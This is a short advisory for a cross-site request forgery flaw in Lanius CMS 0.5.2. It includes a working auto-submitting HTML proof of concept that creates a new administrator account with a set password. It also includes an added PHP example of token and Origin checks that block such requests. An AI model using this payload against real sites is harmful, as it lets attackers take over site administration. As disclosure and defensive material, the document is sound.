| Software | Vulnerability | Tested On | Date |
|---|---|---|---|
| Lanius CMS 0.5.2 r1668 | Cross-site Request Forgery | Windows Vista + XAMPP | 7/5/2010 |
A cross-site request forgery vulnerability in Lanius CMS 0.5.2 r1668 can be exploited to create a new admin.
Proof of Concept
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://localhost/laniuscms/admin.php?com_option=user">
            <input type="hidden" name="task" value="create" />
            <input type="hidden" name="user_id" value="" />
            <input type="hidden" name="user_name" value="a" />
            <input type="hidden" name="user_user" value="new_admin" />
            <input type="hidden" name="user_email" value="" />
            <input type="hidden" name="user_lang" value="" />
            <input type="hidden" name="user_tz" value="" />
            <input type="hidden" name="user_gid" value="5" />
            <input type="hidden" name="user_password" value="Password1" />
            <input type="hidden" name="user_password1" value="Password1" />
        </form>
    </body>
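
A server-side check that rejects the forged request above while accepting the same fields from the real admin form, as an added example (not Lanius CMS code and not part of the original advisory). The function names, the `csrf_token` field, the session layout and the sample origins are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helpers, not Lanius CMS code.

// Issue (or reuse) a per-session anti-CSRF token to embed in every admin form.
function csrf_token(array &$session): string {
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

// Accept a state-changing request only if it carries the session's token and,
// when the browser sent an Origin header, that origin is the site's own.
function csrf_ok(array $session, array $post, array $server, string $ownOrigin): bool {
    if (isset($server['HTTP_ORIGIN']) && $server['HTTP_ORIGIN'] !== $ownOrigin) {
        return false;
    }
    $sent = $post['csrf_token'] ?? '';
    $expected = $session['csrf'] ?? '';
    // hash_equals() compares in constant time; an empty session token never matches.
    return is_string($sent) && $expected !== '' && hash_equals($expected, $sent);
}

// --- constructed sample data, standing in for $_SESSION, $_POST and $_SERVER ---
$session = ['user' => 'admin'];            // logged-in administrator (constructed)
$token   = csrf_token($session);           // would be rendered into the admin form
$own     = 'http://localhost';             // origin of the admin interface

// Fields as sent by the auto-submitting form above: no token, foreign Origin.
$forged    = ['task' => 'create', 'user_user' => 'new_admin', 'user_gid' => '5'];
$forgedHdr = ['HTTP_ORIGIN' => 'http://other-site.example'];

// The same fields submitted from the genuine admin form, which embeds the token.
$legit    = $forged + ['csrf_token' => $token];
$legitHdr = ['HTTP_ORIGIN' => $own];

var_dump(csrf_ok($session, $forged, $forgedHdr, $own)); // cross-site forgery
var_dump(csrf_ok($session, $legit, $legitHdr, $own));   // genuine submission
// The token check alone still rejects the forgery when no Origin header is sent.
var_dump(csrf_ok($session, $forged, [], $own));
```

Marking the session cookie `SameSite=Lax` or `Strict` adds a second layer, since the browser then withholds the cookie from the cross-site POST.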